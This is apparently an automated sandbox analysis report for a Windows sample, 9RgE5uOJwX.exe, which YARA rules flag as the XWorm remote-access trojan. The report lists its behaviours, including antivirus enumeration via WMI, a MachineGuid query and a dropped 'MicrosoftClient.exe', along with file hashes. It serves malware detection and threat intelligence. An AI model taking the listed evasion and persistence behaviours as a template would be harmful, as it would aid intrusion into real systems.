Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Queries volume information: C:\Users\user\AppData\Local\MicrosoftClient.exe VolumeInformation
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Queries volume information: C:\Users\user\AppData\Local\MicrosoftClient.exe VolumeInformation

Source: C:\Users\user\Desktop\9RgE5uOJwX.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

AV process strings found (often used to terminate AV products)

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected XWorm

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 9RgE5uOJwX.exe, type: SAMPLE
Source: Yara match	File source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.9RgE5uOJwX.exe.cf0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.9RgE5uOJwX.exe.13029ac0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.3411654159.0000000013028000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.2129761465.0000000000CF2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 9RgE5uOJwX.exe PID: 2732, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\MicrosoftClient.exe, type: DROPPED

Remote Access Functionality

Yara detected XWorm

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 9RgE5uOJwX.exe, type: SAMPLE
Source: Yara match	File source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.9RgE5uOJwX.exe.cf0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.9RgE5uOJwX.exe.13029ac0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.3411654159.0000000013028000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.2129761465.0000000000CF2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 9RgE5uOJwX.exe PID: 2732, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\MicrosoftClient.exe, type: DROPPED

ID:	1545317
Product:	CloudBasic
Start time:	12:21:05
Start date:	30.10.2024
Sample:	9RgE5uOJwX.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	72f5f19b35b22d82d8459f5e0739c248
SHA1:	0218dd2b354dcfdff2a11d06b6cf57f53987e9eb
SHA256:	4571751b2b7477fded0012f46aded7c86fb93194980897418c17ac917c4d4cc1
Filetype:	Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\MicrosoftClient.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	72F5F19B35B22D82D8459F5E0739C248	0218DD2B354DCFDFF2A11D06B6CF57F53987E9EB	4571751B2B7477FDED0012F46ADED7C86FB93194980897418C17AC917C4D4CC1
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\MicrosoftClient.exe.log	CSV text	30E4BDFC34907D0E4D11152CAEBE27FA	825402D6B151041BA01C5117387228EC9B7168BF	A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	446DD1CF97EABA21CF14D03AEBC79F27	36E4CC7367E0C7B40F4A8ACE272941EA46373799	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1200f3fr.umw.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3m4ooqvu.rkx.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c22fplgp.ftk.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_evg5ljc0.lbp.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fqehw504.zrr.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g1ap1a4r.nhh.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jehizhgh.tgs.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jfmc1crw.fnu.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lbx5p13a.aei.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_odk4swbj.ptx.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t34fekhc.utb.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tpjrcxtd.zeq.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_varukukj.bly.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zfxaurn3.kw0.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zs4qdwzl.de4.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zv3n0vpr.wqm.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

Windows Analysis Report
9RgE5uOJwX.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Compliance

Networking

Operating System Destruction

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report 9RgE5uOJwX.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Compliance

Networking

Operating System Destruction

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
9RgE5uOJwX.exe

Malware Threat Intel
Provided by